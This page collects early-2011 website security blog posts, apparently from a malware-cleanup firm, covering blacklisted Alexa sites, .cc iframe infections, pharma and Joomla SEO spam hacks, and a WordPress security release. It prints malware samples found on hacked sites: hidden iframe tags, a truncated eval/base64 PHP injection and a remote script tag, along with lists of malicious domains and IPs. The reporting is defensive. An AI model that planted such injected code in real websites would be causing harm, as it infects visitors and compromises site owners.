Alexa top sites – Blacklist for January/2011

Every month we analyze Alexa’s TOP 1 million site ranking and correlate that data with Google’s blacklist. Our goal is to get an overall view of the sites that are getting hacked, blacklisted, etc.

For Jan-2011, the number is pretty standard, but a little bit lower than previous months. Out of those top 1 million sites, around 1.4k had their main domain blacklisted (1,447 to be more exact). Compared to previous months, you can see a decline in there (2.1k in Dec, 2.5k in Nov, 3k and Oct, etc).

Why the decline? I would hope that it would be related to a safer Internet and people taking security more seriously, but based on the latest malware we have been analyzing, it seems that they are able to hide from Google pretty well (by not displaying the malware to Google’s IP addresses or to their user agents, etc).

These are the top 100 sites that were flagged and their respective ranking (You can get the full list here):

Read More

The attack from the .cc’s domains

Over the last few days we’ve continued to see a large increase in the number of sites hacked and infected with a malicious iframe from .co.cc (.vv.cc, .cz.cc, etc) domains.

You can run a free scan using SiteCheck to see if you’ve been infected.

That’s how it looks like on a hacked site:

<iframe src="http://hgerwhu45.co.cc/QQkFBg0AAQ..=" width=”1″ height=”1″>

or

<iframe src="http://gqgqhfdjdh.co.cc/QQkFBg0AAQ..==" width=’1` height=`1″>

The number of domains being used in this attack is quite big and only a few of them are blacklisted by Google, but we already identified those at least:

berfry43bgrbf.vv.cc
burifym.cz.cc
drelagda.vv.cc
g243gtdsgsdg.vv.cc
glkgj5j4rshdfhj.vv.cc
gqgqhfdjdh.co.cc
gs34grsgdg.vv.cc
gsdg3gsdgsdg.vv.cc
gsg3gsdgsxgsdg.vv.cc
gwsg3gsgdsgd.vv.cc
hdsh4hsfhdsj.vv.cc
hgerwhu45.co.cc
hndfdfnfdnxdnf.vv.cc
jfgdhdfhsdfh.vv.cc
jfgjfr5jdfj.vv.cc
keleghma.vv.cc
kulawield.vv.cc
maridora.vv.cc
miraswyn.cz.cc
mkgk5jswhgfnxg.vv.cc
oghmalak.vv.cc
siranaya.vv.cc
lookfeel-201101.co.cc

They change quite often, but on a hacked site, the sign is the same: Redirecting to .cc malicious sites and the following PHP code added to the index.php (among with other backdoors):

<?php eval ( base64_decode("ZXJyb3JfcmV.wb3J0aW5nKDApOw0KJGJv.dCA9IEZBTFNFIDsNC…
c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGl…
kYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW…
5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJ…

The decoded malware is available here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=d08451989a742658b8e5a8c4a3788d88

Here’s our malware definition for it: http://sucuri.net/malware/malware-entry-mwjs488

Cleaning up:

Cleaning up is not very hard, you have to remove the malicious code above from your index.php files, upgrade WordPress (Joomla, osCommerce or whatever web application you are using), change all the passwords and check for backdoors (files that you didn’t add). If you need help doing that (or need someone to do it for you), we offer web site malware removal / clean up services

We will post more details /updates as we learn more.

Hilary Kneber Strikes Again – welcometotheglobalisnet

It seems that after a few months quiet, the “Hilary Kneber” group is back at it again. Their latest approach is very typical of Hilary Kneber style attacks affecting GoDaddy shared hosts. Basically they modify every PHP file and the database to make sure every page in the infected site is loading malware.

Today, we’ve started to see various WordPress sites infected with the following malware:

<script src "http://welcometotheglobalisnet.com/js.php?kk=25′></script>

Update 1: We are seeing some Vbulletin forums with the database infected. So it is not restricted to WordPress.
Update 2: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup

Which infects every post in the WordPress database and also modifies all PHP files to generate the above code. Note that the domain is not blacklisted yet so the risk is very high for everyone visiting an infected site.

What happens when someone clicks an infected site?

What the malware does is very simple, it contacts a few domains:

Read More

UCalgary web sites compromised with spam

We were cleaning up a compromised site today (with the unfamous pharma hack), when we saw multiple spam links in the hacked site pointing to ucalgary.ca (big Canadian university). What was interesting is that it was not pointing to a small department sub-domain, but to their main site.

It means attackers were using domains at the University of Calgary to help increase their PR (page rank) and to sell pharmacy related products online.

These were some of the links in their main site that were being used (still live):

Read More

Thailand official foreign affairs / embassy web sites hacked

The Royal Thai (Thailand’s) consulate and embassy web sites (part of their foreign affairs ministry) are currently hacked and infected with a lot of spam (of the pharmacy kind).

Their web site is located at http://www.mfa.go.th and with a quick scan (using our scanner) we can see all the hidden content:

Plus all their pages have multiple hidden links used on blackhat SEO spam campaings:

Read More

Cleaning up an infected website – Part I: WordPress and the Pharma Hack

We get to deal with infected web sites on a daily basis and the most common question we get is how do we clean websites. What steps do we take? What should you do if you want to clean up your site if it gets infected?

This is part one of a small series of posts showing how to clean up sites. We will start with how to clean up “Pharma Hack” on a WordPress driven site due to the popularity. You can follow the series here: http://blog.sucuri.net/category/guides.

*Note that this post covers website clean up only (Mostly applicable to shared servers). If you have a dedicated server (or VPS), there are additional steps to secure it, not covered here.
**If the items contained in this post are more than you want to take on, we are here to help. Visit Sucuri or email us at support@sucuri.net

 

1- Detecting (discovering) that you are hacked

This is the most important step. Most people don’t realize they’ve been exploited, here are a couple things you can do to check your site:

Fire up Google and do a search for “site:yoursite.com”. Check to see if there are any strange titles or spammy results returned on your search. If you see Viagra, Cialis or any other flavor of medicine returned by Google on your search, you’re probably dealing with the Pharma Hack.

If you’re not sure after checking Google, use http://sitecheck.sucuri.net to run a scan. Type your domain name, and if it returns the Pharma Hack (or any other malware) you will see an alert:

Read More

Large Blackhat SEO SPAM Campaign Targeting Joomla Sites

We are seeing a large number Joomla sites hacked and being used in a blackhat SEO SPAM campaign consisting of thousands of infected web sites. Most of them are small and using vulnerable and old versions of Joomla (1.0 and < 1.5.14).

This is how they show up in our scanner:

They all had the following code added to their index.php file to contact 188.72.201.11 and 209.160.33.108 to retrieve the list of links to show up:

Read More

Weekly Malware Update – 2010/Feb/11

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

Pharma / Blackhat SEO Spam by stat-tracker.info and others

We are tracking a large number of web sites that got hacked and are redirecting users to pharmacy-related domains. All the sites had the following code added to their PHP files:

Which basically redirect the user if they came from a search engine. Domains used in these attacks (among many others):

stat-tracker.info
listita.info
babbyboom.ru
startds.net
agency-translation.com
bbt-tv.ru
dl.newsite.in

They just act as an intermediary before sending the user to sites like http://centerpills.com/ and similar (to buy fake pharmacy related products).

For hosting providers, I recommend blocking the following IP addresses: 178.238.134.8, 194.28.172.37 and 88.198.16.186.

All the sites infected had old/ vulnerable versions of web applications running. So make sure to keep your sites updated!


To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.

Something is wrong at WordPress.com / CNN.com

Update: The problem is now fixed, seems to be caused by a redirection error.

Many of the (CNN) VIP sites at WordPress.com are redirecting to: http://superfantastically.com/. It includes politicalticker.blogs.cnn.com, popwatch.ew.com, tech.fortune.cnn.com and many others…

$ curl -D – http://politicalticker.blogs.cnn.com/
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 11 Feb 2011 16:35:41 GMT
Content-Type: text/html
Connection: close
Vary: Cookie
Location: http://superfantastically.com/
Content-Length: 0

$ curl -D – http://popwatch.ew.com/
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 11 Feb 2011 16:36:28 GMT
Content-Type: text/html
Connection: close
Vary: Cookie
Location: http://superfantastically.com/
Content-Length: 0


Read More

WordPress 3.0.5 is available (with security fixes)

If you use WordPress, we recommend updating to the latest version (3.0.5) as soon as possible, specially if you have multiple users with authoring/contributing roles. This is the summary from WordPress.org:

This security release is required if you have any untrusted user accounts, but it also comes with important security enhancements and hardening. All WordPress users are strongly encouraged to update.

The release addresses a number of issues and provides two additional enhancements:

-Two moderate security issues were fixed that could have allowed a Contributor- or Author-level user to gain further access to the site.

-One information disclosure issue was addressed that could have allowed an Author-level user to view contents of posts they should not be able to see, such as draft or private posts.

-Two security enhancements were added. One improved the security of any plugins which were not properly leveraging our security API. The other offers additional defense in depth against a vulnerability that was fixed in previous release.

You can download it here: http://wordpress.org/download/